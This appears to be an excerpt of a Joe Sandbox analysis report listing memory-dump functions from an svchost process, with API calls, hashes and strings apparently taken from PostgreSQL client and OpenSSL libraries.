                                                                                            • Opcode Fuzzy Hash: 8dab0fafdf5eb04351e9aadc300599113ce4e66e0723dcaf7fee12093ab501c1
                                                                                            • Instruction Fuzzy Hash: 420198004AE15A8FA205A3F84CA83AEEF00AF5728CBC03F73D12C83280CBDCDC559162
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 26af5d0348f6a54a36a3667707fcfb94566ef1c56ec22d7fadeb65ff4c4ef6d4
                                                                                            • Instruction ID: 6fb76af64835532a4e73abda8fe6c85793281d701295d68345e55d30e730b48b
                                                                                            • Opcode Fuzzy Hash: 26af5d0348f6a54a36a3667707fcfb94566ef1c56ec22d7fadeb65ff4c4ef6d4
                                                                                            • Instruction Fuzzy Hash: 20015A005AE16A8FA605A7F96CA836EEF009F5725CBD03F73C11C83681CB98DC599162
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F5490: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                              • Part of subcall function 00007FFDA36F5490: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                              • Part of subcall function 00007FFDA36F5490: islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
                                                                                              • Part of subcall function 00007FFDA36F5490: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            • inet_pton.WS2_32 ref: 00007FFDA36E87CF
                                                                                            • X509_get_ext_d2i.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E880F
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E882E
                                                                                            • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8848
                                                                                            • ASN1_STRING_get0_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E8893
                                                                                            • ASN1_STRING_length.LIBCRYPTO-3-X64 ref: 00007FFDA36E889E
                                                                                            • ASN1_STRING_get0_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E88E0
                                                                                            • ASN1_STRING_length.LIBCRYPTO-3-X64 ref: 00007FFDA36E88EB
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E891C
                                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E8947
                                                                                            • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8958
                                                                                            • X509_NAME_get_index_by_NID.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8970
                                                                                            • X509_NAME_get_entry.LIBCRYPTO-3-X64 ref: 00007FFDA36E8989
                                                                                            • X509_NAME_ENTRY_get_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E8991
                                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E89BB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8A29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: X509_$G_get0_dataG_lengthL_sk_pop_free_errnofree$E_get_entryE_get_index_by_L_sk_numL_sk_valueX509_get_ext_d2iX509_get_subject_nameY_get_datainet_ptonisdigitislowerisspaceisxdigitlibintl_dgettext
                                                                                            • String ID: SSL certificate's address entry is missing$SSL certificate's name entry is missing
                                                                                            • API String ID: 2138642427-228965108
                                                                                            • Opcode ID: 06598c1850be35af291b887ff2bcad40ee217c7f5a1a08535ae7aa15870da6ec
                                                                                            • Instruction ID: 117e4b2f5b7eedfd9555aa7201523a1b203f66763d65dc842e2ab6d8957adcc0
                                                                                            • Opcode Fuzzy Hash: 06598c1850be35af291b887ff2bcad40ee217c7f5a1a08535ae7aa15870da6ec
                                                                                            • Instruction Fuzzy Hash: F7719221B0B64245FA649F1694647BA2392AF84FC0F2C6031EE4E67787DF3EE5098708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: B$~
                                                                                            • API String ID: 0-3389668641
                                                                                            • Opcode ID: 0212c1db6f743c84e300394e62da1c33dec591be78bacb6d674b35509949d6a5
                                                                                            • Instruction ID: f098a254a53350fbaa60f5dd94fdb3b3bd2723cb2df1011593ae929d7b56a854
                                                                                            • Opcode Fuzzy Hash: 0212c1db6f743c84e300394e62da1c33dec591be78bacb6d674b35509949d6a5
                                                                                            • Instruction Fuzzy Hash: C1411662A1D1D08AE321CBF8585034EFE90D78374CF805636E99C4BB85DBB9CACAC701
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp$isdigit
                                                                                            • String ID: COPY $DELETE $FETCH $INSERT $MERGE $MOVE $SELECT $UPDATE $could not interpret result from server: %s
                                                                                            • API String ID: 1602326022-2133127423
                                                                                            • Opcode ID: e81b60ef051d0d388a3d434c21f2c968fecab9034280d4eec6985afcf63c1a1b
                                                                                            • Instruction ID: cbbd47c8cf4adb5ac4f8c0e1b6e9104f162c520e7be4e6fcc1b4940c4a0e5c05
                                                                                            • Opcode Fuzzy Hash: e81b60ef051d0d388a3d434c21f2c968fecab9034280d4eec6985afcf63c1a1b
                                                                                            • Instruction Fuzzy Hash: 63414052B0AE03A1FF709F11E8602756762FF04BC4F5C6035C64E976A6EE2EE509C318
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb28f72f6592609cf4d21a195de0ed0adb42e32375e935bc0d71a0d2eec73327
                                                                                            • Instruction ID: 192359993db2c8d718cc06c339a81297c1da460534435a0e025d700669a48dda
                                                                                            • Opcode Fuzzy Hash: fb28f72f6592609cf4d21a195de0ed0adb42e32375e935bc0d71a0d2eec73327
                                                                                            • Instruction Fuzzy Hash: 86414622A6D1958BD31997F8D89479DFE409B6374CFC06A72D91807B94C6EDCD81C702
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: A
                                                                                            • API String ID: 4206212132-3554254475
                                                                                            • Opcode ID: cc3049037457acc8c7fce60de4365968d393392804b6219ad68f81f4101c4349
                                                                                            • Instruction ID: 0b8bb495434735308b67a349bf07383e5f120c4627f23e42e7402b650fce39ab
                                                                                            • Opcode Fuzzy Hash: cc3049037457acc8c7fce60de4365968d393392804b6219ad68f81f4101c4349
                                                                                            • Instruction Fuzzy Hash: 4E11DF12A6E1558BE211DBF81C9039EEE50CB8336CB806B33E95807684CBA9CD8A8601
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFA8
                                                                                              • Part of subcall function 00007FFDA36EBF90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36EBFE0
                                                                                              • Part of subcall function 00007FFDA36EBF90: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EC079
                                                                                            • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,show password_encryption,0000000800282019,?,00007FFDA36E4CE3), ref: 00007FFDA36E5635
                                                                                              • Part of subcall function 00007FFDA36EC210: memcpy.VCRUNTIME140(?,?,?,00007FFDA36D14F3), ref: 00007FFDA36EC252
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$atoimemcpyrealloc
                                                                                            • String ID: at character %s$%s$%s, $%s: $%s: $%s:%s$COLUMN NAME: %s$CONSTRAINT NAME: %s$CONTEXT: %s$DATATYPE NAME: %s$DETAIL: %s$HINT: %s$LOCATION: $QUERY: %s$SCHEMA NAME: %s$TABLE NAME: %s$no error message available$out of memory
                                                                                            • API String ID: 2504634096-1868357448
                                                                                            • Opcode ID: 6442449a5889c5902a691c08a288958c2d56ab7a17f59190937a26c3f0c437bb
                                                                                            • Instruction ID: efbb66e293317a44cf4abb2217e8c0e4a390e76a18cce5c048d3664a110c0c3f
                                                                                            • Opcode Fuzzy Hash: 6442449a5889c5902a691c08a288958c2d56ab7a17f59190937a26c3f0c437bb
                                                                                            • Instruction Fuzzy Hash: DCB16F10B4F65745FD54AA52A9713BA12935F46BC0F2C6035DE0D2BBDBEE2FE40A8348
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 23102bc263e5e77f3b14829779a009aa3b4c0558342c76755987f36c74aeb397
                                                                                            • Instruction ID: c560aa4b0286726218898c0f564d76fb74659f165ed1c152a9ff8babe05b652e
                                                                                            • Opcode Fuzzy Hash: 23102bc263e5e77f3b14829779a009aa3b4c0558342c76755987f36c74aeb397
                                                                                            • Instruction Fuzzy Hash: 52F0F3519AE45A9B9510B3F84CA93AEEF109F9732CBD07F73E52C832909F9CCD155121
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmemsetstrtol
                                                                                            • String ID: 28P01$57P03$expected authentication request from server, but received %c$invalid port number: "%s"$password retrieved from file "%s"$received invalid authentication request$received invalid error message$received invalid protocol negotiation message$server is not in hot standby mode$session is not read-only
                                                                                            • API String ID: 3302279146-2634374696
                                                                                            • Opcode ID: b2dfe49b34d677d3c29ed195cf4bd817914b4874c9a2d14e591925b781bee3a2
                                                                                            • Instruction ID: 1d6ddbb45b3fa4f247a52bfecfa709882e1877607b8ce906de4e44c52ecd5e9d
                                                                                            • Opcode Fuzzy Hash: b2dfe49b34d677d3c29ed195cf4bd817914b4874c9a2d14e591925b781bee3a2
                                                                                            • Instruction Fuzzy Hash: DEF1B523B0AA8286F752CF25C0617B827A2EF41B84F5C6035DA4D5778ADF3EE944C718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnomemcpy$ErrorLastlibintl_dgettextrealloc
                                                                                            • String ID: %s() failed: %s$cannot allocate memory for input buffer$connection not open$invalid socket$select$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 2572778661-195360840
                                                                                            • Opcode ID: 683736e225a0484b0e8a7b908ca4e21e0da3be9cceff152e3ea7f260e115fc93
                                                                                            • Instruction ID: 6e4c0efeaa1eb0a3f07e825ceabc0dad4e70cae46883900b0d7e89f6bd45bd90
                                                                                            • Opcode Fuzzy Hash: 683736e225a0484b0e8a7b908ca4e21e0da3be9cceff152e3ea7f260e115fc93
                                                                                            • Instruction Fuzzy Hash: 63C1E672B0A78286FB619F24E4643B823A7EB44B44F2C6135D91D5738ADF3EE0458714
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F46F0: strstr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F473E
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F476F
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F478A
                                                                                              • Part of subcall function 00007FFDA36F46F0: strchr.VCRUNTIME140(?,?,00000000,00007FFDA36DA2A2), ref: 00007FFDA36F47A3
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA2DB
                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA33F
                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA366
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA3B4
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA534
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDA36DA581
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strchr$_errnofgetsisspace$fcloselibintl_dgettextstrncmpstrstr
                                                                                            • String ID: ldap$line %d too long in service file "%s"$nested service specifications not supported in service file "%s", line %d$out of memory$service$service file "%s" not found$syntax error in service file "%s", line %d
                                                                                            • API String ID: 778619447-2385001604
                                                                                            • Opcode ID: c11a0dcc67e5daa4ceced3dc4c3845162573d83c8acb8d6d04be37b7ecb065c6
                                                                                            • Instruction ID: 8b5f6e419f019de6453e3ed329728ee39a9b050be773650faf831bc3bf795ac0
                                                                                            • Opcode Fuzzy Hash: c11a0dcc67e5daa4ceced3dc4c3845162573d83c8acb8d6d04be37b7ecb065c6
                                                                                            • Instruction Fuzzy Hash: BA91B012B0FB8641FA618B15E43027927A2AF46BD4F4C6235CE6E677D3DE2EE5058318
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_new$i2d_$L_sk_numR_set_debugX509_$L_sk_valueO_zalloc
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_status_request
                                                                                            • API String ID: 622043022-2755818124
                                                                                            • Opcode ID: 2c06f7c23f30e9df08e97f9bc69625d356fa9eeae623a73366c167eac32ac3de
                                                                                            • Instruction ID: fbac78deb569b30d966e24f8b54a83e8ef6eb3d01096a9b206fa1a97e76fcc94
                                                                                            • Opcode Fuzzy Hash: 2c06f7c23f30e9df08e97f9bc69625d356fa9eeae623a73366c167eac32ac3de
                                                                                            • Instruction Fuzzy Hash: BB517E65F0F24342F658A72194722F912539F8A7C0F4C6832DD0CABBD7DF2EE9568209
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: B
                                                                                            • API String ID: 4206212132-1255198513
                                                                                            • Opcode ID: f7dd0cc482dba60a8c8a3f983b02cab4520f0e6043719a85abf665c3be207379
                                                                                            • Instruction ID: af839d126afc234641b54c59f780b880c5c28a3208696f70e3e69a81d6de6da9
                                                                                            • Opcode Fuzzy Hash: f7dd0cc482dba60a8c8a3f983b02cab4520f0e6043719a85abf665c3be207379
                                                                                            • Instruction Fuzzy Hash: 0D41D572A5D1549BE7108BF8C85439EEE91EB47348F819A33EA0987344DBBDCCC5C241
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getenv$FolderPathmemset
                                                                                            • String ID: %s/%s$%s/pg_service.conf$%s/postgresql$.pg_service.conf$/etc$PGSERVICE$PGSERVICEFILE$PGSYSCONFDIR$definition of service "%s" not found$service
                                                                                            • API String ID: 334560960-118289201
                                                                                            • Opcode ID: 1ffb34a53ca5aac99b5c39ff3d643f82db0ade1e4b65ad68bf65780aea1ee9e9
                                                                                            • Instruction ID: 13161a3e99d889747002ab0e3a11010bbf73698230abbcb9f938b6d8ae306c2d
                                                                                            • Opcode Fuzzy Hash: 1ffb34a53ca5aac99b5c39ff3d643f82db0ade1e4b65ad68bf65780aea1ee9e9
                                                                                            • Instruction Fuzzy Hash: 1C518926B1FA8292FA60DB11E4642F563A2FF947C4F886031D94D63797DF2DD508C704
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36ECF06
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
